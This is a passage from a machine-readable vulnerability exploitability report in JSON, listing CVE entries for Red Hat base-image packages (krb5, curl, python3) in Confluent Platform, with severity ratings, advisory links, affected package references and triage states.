          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/krb5-workstation@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libkadm5@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-11856",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 9.8,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
        }
      ],
      "cwes": [
        294
      ],
      "description": "Successfully using libcurl to do a transfer to a specific HTTP origin\n(`hostA`) with **Digest** authentication and then changing the origin to a\ndifferent one (`hostB`) for a second transfer, reusing the same handle, makes\nlibcurl wrongly pass on the  `Authorization:` header field meant for `hostA`,\nto `hostB`.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-11856"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-11856"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-11856.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-11856.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-9crq-qh8v-6xmm"
        },
        {
          "url": "https://hackerone.com/reports/3793260"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11856"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-11856"
        }
      ],
      "published": "2026-07-03T07:16:23+00:00",
      "updated": "2026-07-07T19:43:55+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-11940",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.3,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        }
      ],
      "cwes": [
        22,
        59
      ],
      "description": "tarfile.extractall() with the 'data' or 'tar'\n filter could be bypassed by a crafted archive where a hardlink \nreferences a symlink stored at a deeper name than the hardlink itself.\u00a0 \nThe extraction fallback validated the symlink at it's archived location \nbut recreated it at the hardlink's shallower\npath, letting a relative\n target the filter judged contained escape the destination directory.\u00a0 \nThis allowed a malicious tar archive to create a symlink pointing \noutside the destination, enabling out-of-destination file reads or \nwrites. This was an incomplete fix of CVE-2025-4330.",
      "recommendation": "Upgrade python-unversioned-command to version 3.9.25-7.el9_8.3; Upgrade python3 to version 3.9.25-7.el9_8.3; Upgrade python3-libs to version 3.9.25-7.el9_8.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-11940"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54268"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-11940"
        },
        {
          "url": "https://bugzilla.redhat.com/2491848"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2491848"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-11940"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-54268.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:54268"
        },
        {
          "url": "https://github.com/python/cpython/commit/0f852b3f07dd8e71e40326a51c02afbf16a42cc5"
        },
        {
          "url": "https://github.com/python/cpython/commit/27dd970bf6b17ebca7c8ed486a40ab043ed7af8f"
        },
        {
          "url": "https://github.com/python/cpython/commit/672825e2f36a57e173959b0d9d409d4560dab8df"
        },
        {
          "url": "https://github.com/python/cpython/commit/771d12dda5140313db0ac550292987975651bbde"
        },
        {
          "url": "https://github.com/python/cpython/commit/79c06bd5c6afa3c440d50faf7ee1b147c8832b4c"
        },
        {
          "url": "https://github.com/python/cpython/commit/be13e86f6b9788a6f4d0419dffef72cbae5865c9"
        },
        {
          "url": "https://github.com/python/cpython/commit/e5fdbd8d5aa923bd9111b112ea73bd6ec7c47877"
        },
        {
          "url": "https://github.com/python/cpython/issues/151558"
        },
        {
          "url": "https://github.com/python/cpython/pull/151559"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-11940.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-54268.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/LD6QIISNQFQYOIEPJNEUIPV7S3V76FZH/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11940"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-11940"
        }
      ],
      "published": "2026-06-23T17:16:40+00:00",
      "updated": "2026-08-13T01:16:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-11972",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        252,
        606,
        770
      ],
      "description": "When using the \"tarfile\" module with a file opened in \"streaming mode\" (mode=\"r|\") the tarfile module did not properly handle EOF, making archive parsing take exponentially longer.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-11972"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-11972"
        },
        {
          "url": "https://github.com/python/cpython/commit/3f031d431f80668e14f3bc066bbf4369cd9281b9"
        },
        {
          "url": "https://github.com/python/cpython/commit/4ce6bf7c8aa7725828a38981c306f214c1f29365"
        },
        {
          "url": "https://github.com/python/cpython/commit/7f0dc59c9a70f8f3b4da33d7c4a2ba552a7acc21"
        },
        {
          "url": "https://github.com/python/cpython/commit/e86666c9dd256d52d0fbef6feb1ea4a51768fdec"
        },
        {
          "url": "https://github.com/python/cpython/commit/eb63c0f94dfcbea7fda8eab6213818e134d67192"
        },
        {
          "url": "https://github.com/python/cpython/commit/f50bf13566189c8d0ce5a814f33eff3d89951896"
        },
        {
          "url": "https://github.com/python/cpython/commit/f5e2776ff0383a902c12acf2b703e7e951fc8438"
        },
        {
          "url": "https://github.com/python/cpython/issues/151981"
        },
        {
          "url": "https://github.com/python/cpython/pull/151982"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/AXPSKKTSRKXTTJULW3XSIC74WZNAAPPB/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11972"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-11972"
        }
      ],
      "published": "2026-06-23T23:16:49+00:00",
      "updated": "2026-08-13T01:16:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
